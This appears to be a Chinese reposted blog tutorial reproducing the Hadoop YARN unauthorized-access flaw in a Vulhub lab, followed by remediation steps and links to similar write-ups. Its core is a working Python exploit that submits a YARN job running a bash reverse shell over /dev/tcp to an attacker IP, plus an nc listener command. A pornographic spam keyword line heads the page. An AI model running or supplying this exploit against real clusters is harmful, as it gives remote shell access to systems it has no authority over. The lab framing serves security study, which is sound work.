国产无码综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

Hadoop未授權(quán)訪問 getshell——漏洞復(fù)現(xiàn)

1年前作者：Jamey-分類：Toy博客閱讀(25)違法舉報(bào)

這篇具有很好參考價(jià)值的文章主要介紹了Hadoop未授權(quán)訪問 getshell——漏洞復(fù)現(xiàn)。希望對(duì)大家有所幫助。如果存在錯(cuò)誤或未考慮完全的地方，請(qǐng)大家不吝賜教，您也可以點(diǎn)擊"舉報(bào)違法"按鈕提交疑問。

?Hadoop未授權(quán)訪問漏洞介紹

Hadoop是一個(gè)由Apache基金會(huì)所開發(fā)的分布式系統(tǒng)基礎(chǔ)架構(gòu)，由于服務(wù)器直接在開放了 Hadoop 機(jī)器 HDFS 的 50070 web 端口及部分默認(rèn)服務(wù)端口，黑客可以通過命令行操作多個(gè)目錄下的數(shù)據(jù)，如進(jìn)行刪除，下載，目錄瀏覽甚至命令執(zhí)行等操作，產(chǎn)生極大的危害。

靶場(chǎng)搭建

靶機(jī)： ubuntu docker IP: 192.168.189.131

攻擊機(jī)： kali IP: 192.168.189.128

直接使用 vluhub 環(huán)境了

在?hadoop/unauthorized-yarn目錄下終端輸入docker-compose up -d啟動(dòng)環(huán)境

hadoop未授權(quán)訪問漏洞,linux

訪問ubuntu靶機(jī)的8088端口 http://192.168.189.131:8088 即可看到Hadoop YARN ResourceManager WebUI頁面（未授權(quán)訪問漏洞）

hadoop未授權(quán)訪問漏洞,linux

利用過程如下：

在本地監(jiān)聽等待反彈 shell 連接

調(diào)用 New Application API 創(chuàng)建 Application

調(diào)用 Submit Application API 提交

編寫以下exp——python腳本，放在ubuntu的桌面上：

#!/usr/bin/env python

import requests

target = 'http://192.168.189.131:8088/'
lhost = '192.168.189.128' # put your local host ip here, and listen at port 9999

url = target + 'ws/v1/cluster/apps/new-application'
resp = requests.post(url)
app_id = resp.json()['application-id']
url = target + 'ws/v1/cluster/apps'
data = {
    'application-id': app_id,
    'application-name': 'get-shell',
    'am-container-spec': {
        'commands': {
            'command': '/bin/bash -i >& /dev/tcp/%s/9999 0>&1' % lhost,
        },
    },
    'application-type': 'YARN',
}
requests.post(url, json=data)

kali 打開 nc 監(jiān)聽端口

 nc -nvlp 9999

在 Ubuntu運(yùn)行腳本exp-python.py?獲取shell

python3 exp-python.py

漏洞修復(fù)

1、如無必要，關(guān)閉 Hadoop Web 管理頁面。

2、開啟身份驗(yàn)證，防止未經(jīng)授權(quán)用戶訪問。

3、設(shè)置“安全組”訪問控制策略，將 Hadoop 默認(rèn)開放的多個(gè)端口對(duì)公網(wǎng)全部禁止或限制可信任的 IP 地址才能訪問包括 50070 以及 WebUI 等相關(guān)端口。文章來源地址http://www.zghlxwxcb.cn/news/detail-853825.html

到了這里，關(guān)于Hadoop未授權(quán)訪問 getshell——漏洞復(fù)現(xiàn)的文章就介紹完了。如果您還想了解更多內(nèi)容，請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章，希望大家以后多多支持TOY模板網(wǎng)！

本文來自互聯(lián)網(wǎng)用戶投稿，該文觀點(diǎn)僅代表作者本人，不代表本站立場(chǎng)。本站僅提供信息存儲(chǔ)空間服務(wù)，不擁有所有權(quán)，不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載，請(qǐng)注明出處：如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實(shí)不符，請(qǐng)點(diǎn)擊違法舉報(bào)進(jìn)行投訴反饋，一經(jīng)查實(shí)，立即刪除！

分享到：

領(lǐng)支付寶紅包贊助服務(wù)器費(fèi)用

Hadoop 漏洞復(fù)現(xiàn)
Hadoop作為一個(gè)分布式計(jì)算應(yīng)用程序框架，種類功能繁多，各種組件安全問題會(huì)帶來很大的攻擊面。Apache Hadoop YARN是Hadoop的核心組件之一，負(fù)責(zé)將資源分配在Hadoop集群中運(yùn)行的各種應(yīng)用程序，并調(diào)度要在不同集群節(jié)點(diǎn)上執(zhí)行的任務(wù)。(獨(dú)立出的資源管理框架，負(fù)責(zé)資源管理和調(diào)度
2024年02月17日
瀏覽(12)
springboot未授權(quán)漏洞(漏洞復(fù)現(xiàn)Springboot未授權(quán)訪問及修復(fù))
Actuator 的核心是端點(diǎn) Endpoint，它用來監(jiān)視應(yīng)用程序及交互，spring-boot-actuator 中已經(jīng)內(nèi)置了非常多的Endpoint（health、info、beans、metrics、httptrace、shutdown等等），同時(shí)也允許我們自己擴(kuò)展自己的Endpoints。每個(gè) Endpoint 都可以啟用和禁用。要遠(yuǎn)程訪問 Endpoint，還必須通過 JMX 或 HTTP 進(jìn)
2024年02月05日
瀏覽(27)
漏洞復(fù)現(xiàn) - - - Springboot未授權(quán)訪問
目錄一，未授權(quán)訪問是什么？二，Actuator介紹三，怎么進(jìn)行漏洞發(fā)現(xiàn)呢？四，實(shí)驗(yàn)環(huán)境五，漏洞復(fù)現(xiàn) 1.通過訪問env獲取全部環(huán)境屬性 2.通過/trace提供基本的http請(qǐng)求跟蹤信息 3.利用反序列化進(jìn)行g(shù)etshell ?1.啟動(dòng)腳本 2.開啟監(jiān)聽 ?3.使用bp抓取一個(gè)/env的包 4.修改POST數(shù)據(jù) 未授權(quán)
2024年01月20日
瀏覽(18)
Druid未授權(quán)訪問漏洞復(fù)現(xiàn)
Druid是阿里巴巴數(shù)據(jù)庫事業(yè)部出品，為監(jiān)控而生的數(shù)據(jù)庫連接池。Druid提供的監(jiān)控功能，監(jiān)控SQL的執(zhí)行時(shí)間、監(jiān)控Web URI的請(qǐng)求、Session監(jiān)控。當(dāng)開發(fā)者配置不當(dāng)時(shí)就可能造成未授權(quán)訪問漏洞。 1、通過目錄掃描或手工輸入路徑http://www.xxxx.com/druid/index.html，發(fā)現(xiàn)存在Druid 未授權(quán)訪
2024年02月11日
瀏覽(15)
【Elasticsearch 未授權(quán)訪問漏洞復(fù)現(xiàn)】
ElasticSearch是一個(gè)基于Lucene的搜索服務(wù)器。它提供了一個(gè)分布式多用戶能力的全文搜索引擎，基于RESTful web接口。Elasticsearch是用Java開發(fā)的，并作為Apache許可條款下的開放源碼發(fā)布，是當(dāng)前流行的企業(yè)級(jí)搜索引擎。Elasticsearch的增刪改查操作全部由http接口完。由于Elasticsearch授權(quán)
2024年02月05日
瀏覽(21)
Redis未授權(quán)訪問漏洞搭建復(fù)現(xiàn)
今天我們來學(xué)習(xí)一下什么是Redis未授權(quán)訪問漏洞，以及各種利用方法。文章目錄一、什么是Redis未授權(quán)訪問漏洞二、 Redis環(huán)境搭建三、漏洞利用四、漏洞總結(jié) 五、漏洞防護(hù) ??????? ?Redis因配置不當(dāng)可以導(dǎo)致未授權(quán)訪問，被攻擊者惡意利用。當(dāng)前流行的針對(duì)Redis未授權(quán)訪
2024年02月06日
瀏覽(21)
Springboot Actuator未授權(quán)訪問漏洞復(fù)現(xiàn)
更新時(shí)間：2022.07.20 Spring Boot Actuator 模塊提供了生產(chǎn)級(jí)別的功能，比如健康檢查，審計(jì)，指標(biāo)收集，HTTP 跟蹤等，幫助監(jiān)控和管理Spring Boot 應(yīng)用。這個(gè)模塊是一個(gè)采集應(yīng)用內(nèi)部信息暴露給外部的模塊，上述的功能都可以通過HTTP 和 JMX 訪問。（來源：https://mp.weixin.qq.com/s/qY-hBSa
2023年04月16日
瀏覽(18)
【漏洞復(fù)現(xiàn)】StarRocks MPP數(shù)據(jù)庫未授權(quán)訪問漏洞
????????StarRocks 是一個(gè)MPP數(shù)據(jù)庫，具備水平在線擴(kuò)縮容，金融級(jí)高可用，兼容 MySQL 5.7 協(xié)議和 MySQL 生態(tài)，提供全面向量化引擎與多種數(shù)據(jù)源聯(lián)邦查詢等重要特性。StarRocks 致力于在全場(chǎng)景 OLAP 業(yè)務(wù)上為用戶提供統(tǒng)一的解決方案，適用于對(duì)性能，實(shí)時(shí)性，并發(fā)能力和靈活性有
2024年01月17日
瀏覽(84)
【vulhub漏洞復(fù)現(xiàn)】redis 4-unacc 未授權(quán)訪問漏洞
影響版本 Redis 2.x，3.x，4.x，5.x Redis默認(rèn)情況下，會(huì)綁定在0.0.0.0:6379(在redis3.2之后，redis增加了protected-mode，在這個(gè)模式下，非綁定IP或者沒有配置密碼訪問時(shí)都會(huì)報(bào)錯(cuò))，如果沒有進(jìn)行采用相關(guān)的策略，比如添加防火墻規(guī)則避免其他非信任來源ip訪問等等，這樣將會(huì)將Redis服務(wù)暴
2023年04月25日
瀏覽(16)
CVE-2023-23752：Joomla未授權(quán)訪問漏洞復(fù)現(xiàn)
本次測(cè)試僅供學(xué)習(xí)使用，如若非法他用，與本文作者無關(guān)，需自行負(fù)責(zé)?。。?Joomla是一個(gè)免費(fèi)的開源內(nèi)容管理系統(tǒng)（CMS），允許用戶構(gòu)建網(wǎng)站和在線應(yīng)用程序。它于 2005 年首次發(fā)布，此后成為最受歡迎的 CMS 平臺(tái)之一，為全球數(shù)百萬個(gè)網(wǎng)站提供支持。在 Joomla！ 4.0.0 到 4.2.7
2024年02月10日
瀏覽(17)

<center id="8rexz"><ul id="8rexz"></ul></center>